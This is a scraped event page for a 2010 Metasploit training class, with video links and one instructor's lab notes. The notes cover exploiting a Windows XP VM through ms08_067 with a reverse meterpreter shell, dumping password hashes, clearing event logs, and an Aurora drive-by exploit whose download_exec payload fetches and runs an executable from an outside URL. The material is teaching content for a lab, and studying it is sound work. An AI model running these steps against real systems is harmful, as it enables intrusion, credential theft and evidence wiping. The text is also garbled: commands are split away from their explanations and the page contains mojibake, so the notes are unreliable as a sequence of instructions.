Metasploit Class Videos

On May 8th 2010 the Kentuckiana ISSA held a 7-hour Metasploit class at the Brown Hotel in Louisville, KY. Proceeds from the class went to the Hackers For Charity Food for Work program. The instructors were David "ReL1K" Kennedy, Martin "PureHate" Bos, Elliott "Nullthreat" Cutright, Pwrcycle and Adrian "Irongeek" Crenshaw. Below are the videos of the event. I hope you enjoy them, and if you do please consider donating to Johnny Long's organization. This should be more Metasploit than you can stand! Note: for best viewing download the AVIs; the streaming versions are not as high quality.
high quality. 1 Metasploit Intro - Irongeek [フレーム] Download video: Slides can be found at:
[フレーム] Download video: Slides can be found at:
[フレーム]
Download video: Slides can be found at: [フレーム] Slides can be found at: [フレーム] Download video:
[フレーム] Slides can be found at: Websites of the groups and people involved in setting up the class: http://www.hackersforcharity.org
What follows are the class notes for Adrian's section: Metasploit Intro: Class
Notes -------------------------------------------------------- startx Then, since the network starts off as disabled (a good
idea so as not to announce yourself on the network till you are ready) let's
bring it up and note our IP: /etc/init.d/networking start ifconfig ipconfig msfupdate msfcli | less msfgui msfweb& http://127.0.0.1:55555 psexec On the list that comes up, choose "Microsoft
Windows Authenticated User Code Execution", "Automatic"
and for payload choose "windows/vncinject/reverse_tcp" msfconsole ifconfig help search netapi info windows/smb/ms08_067_netapi use exploit/windows/smb/ms08_067_netapi setg payload windows/meterpreter/reverse_tcp set encoder x86/shikata_ga_nai show
options Anything else cool we can do to customize the pwnage? show advanced Ok, let痴 set some required options that don稚 already
have defaults, fill in the items in brackets accordingly: setg
rhost <XP box's IP> Now let痴 tell Metasploit to fire off the exploit, and see
if things work: exploit help sysinfo shell Get back to the MSFConsole prompt: background Ok, let's get back into our Meterpreter session: sessions -i 1 <We are now in Meterpreter> execute -f notepad.exe
hashdump Clear the event log: clearev run scraper screenshot msfconsole http://<ip of BT4 box>:8080/pwnme Under BT4, web surf to: http://<ip of XP box>
http://www.offensive-security.com/metasploit-unleashed/
http://www.archive.org/download/LouisvilleMetasploitClass/1MetasploitIntro-Irongeek.avi
http://www.irongeek.com/downloads/metasploit-intro.pdf
2 Metasploit Scanning and Pivoting - Pwrcycle
http://www.archive.org/download/LouisvilleMetasploitClass/2MetasploitScanningAndPivoting-Pwrcycle.avi
http://cafecode.com/metasploit/
3 Metasploit Fuzzing and Exploit Development - Nullthreat
http://www.archive.org/download/LouisvilleMetasploitClass/3MetasploitFuzzingAndExploitDevelopment-Nullthreat.avi
http://www.nullthreat.net
4 Meterpreter and Post Exploitation (and a demo of Metasploit Express) -
Purehate
Download video:
http://www.archive.org/download/LouisvilleMetasploitClass/4MeterpreterAndPostExploitation-Purehate.avi
http://bit.ly/d8QZwR
5 Social Engineering Toolkit - ReL1K
http://www.archive.org/download/LouisvilleMetasploitClass/5SocialEngineeringToolkit-Rel1k.avi
6 More Encoding Fun, Fasttrack and Closing - ReL1K
Download video:
http://www.archive.org/download/LouisvilleMetasploitClass/6MoreEncodingFasttrackAndClosing-Rel1k.avi
http://www.secmaniac.com (whenever
Dave puts them out there :) )
http://www.metasploit.com
http://www.issa-kentuckiana.org
http://www.offensive-security.com
http://www.secmaniac.com
http://tools.question-defense.com
http://www.nullthreat.net
http://indysec.blogspot.com/
http://irongeek.com
This sheet is meant to be a convenient set of notes for the exercises
Adrian will be demonstrating in class. These are the commands used in the
demos for your reference, along with why they were used. Items in
blue are things you type, green
are things you click, gray is something optional that you may
want to play with latter and red is just to
grab your attention.
Exercise 0: Getting into BackTrack 4
--------------------------------------------------------
Login with "root" as the user name and "toor"
as the password. So we can more easily get around, we will also start up X
windows:
--------------------------------------------------------
Exercise 0.5: Login to XP
--------------------------------------------------------
Log in with "IndySploit" as the user name and "password"
as the password. Then note our IP (Students will not need to do this step
unless they brought their own XP VM):
--------------------------------------------------------
Exercise 1: A few simple commands for Metasploit in BT4
--------------------------------------------------------
I plan to point these commands out, but not run them to completion.
Grab the latest Metasploit Modules:
If you want to script some stuff later, look into:
There is also the GUI, but we will not be using it in class:
--------------------------------------------------------
Exercise 2: Let's Demo Metasploit MSFWeb interface in BT4
--------------------------------------------------------
To start off easy let痴 use the web interface. It is not as well supported
as msfconsole, but it痴 prettier to show management the easy of exploitation
(the ampersand is there so we can keep typing commands at the shell):
Now let's start FireFox and go to:
You will most likely have to disable NoScript to het the web interface to
work correctly.
Now that we have the web interface up, let's look for a module to use. Click
"Exploit", and on the search bar enter:
For the RHOST enter the IP of the XP box. SMB Password and SMB User are
"password" and "IndySploit"
respectively. For LHOST enter the BT4 box's IP. Not clicking the "Launch Exploit"
button should be all we need to do to get a lovely VNC session.
--------------------------------------------------------
Exercise 3: Let's use MSFConsole under BT4
--------------------------------------------------------
Fire up the MSFConsole:
Now note that you can type normal *nix commands for inside of MSFConsole:
When in doubt, scream and shout:
Also note, tab completion works.
Now in MSFWeb we did not use a real vulnerability (psexec really is a
feature), so let痴 try an exploit this time. First let痴 find an exploit:
Ok, we found one I want to use, let's find out more about it:
Sounds good, let's use it:
Now we need to set some options. We can use "set" to just set them this one
time, or use "setg" so they stick around if we switch to another module. Use
"back", "unset" or "unsetg" if you screw up and have a typo. Let select a
payload to use:
We could also set an encoder to use, but this is optional:
Ok, what options do we need to set?
setg lhost <BT4 box's IP>
If that worked, we should have a Meterpreter session. Martin will talk more
on Meterpreter later, but here are a few Commands to try:
<We are now in Meterpreter>
Get some help:
Let痴 get some info about the system:
Get a command prompt on the exploited box:
exit
<We are now out of Meterpreter>
Ok, what sessions are there?
help sessions
sessions
We will try to run a command on the remote box, and see it in the process
list:
ps
Grab some hashes:
Run a Meterpreter script:
A bunch of nifty stuff should now be in /root/.msf3/logs/scraper/
If you have updated to the latest version, this is a also a fun command:
--------------------------------------------------------
Exercise 4: Extra credit, start a server on your box and do a drive by
browser exploit
--------------------------------------------------------
(You will need to have an Internet connection, used
msfupdate to get the latest modules, and have a webcam hooked up to the
exploited box. Or you could just modify these commands to work for your
circumstances.)
Under BT4 VM :
use exploit/windows/browser/ms10_002_aurora
set uripath pwnme
set payload windows/download_exec
set url http://irongeek.com/temp/camserver.exe
exploit
On the XP box, web surf to:
Useful Links:
http://www.irongeek.com/
http://www.secmaniac.com/
http://tools.question-defense.com
http://www.room362.com/
http://www.darkoperator.com/meterpreter/
http://www.isd-podcast.com/
Copyright 2020, IronGeek
Louisville / Kentuckiana Information Security Enthusiast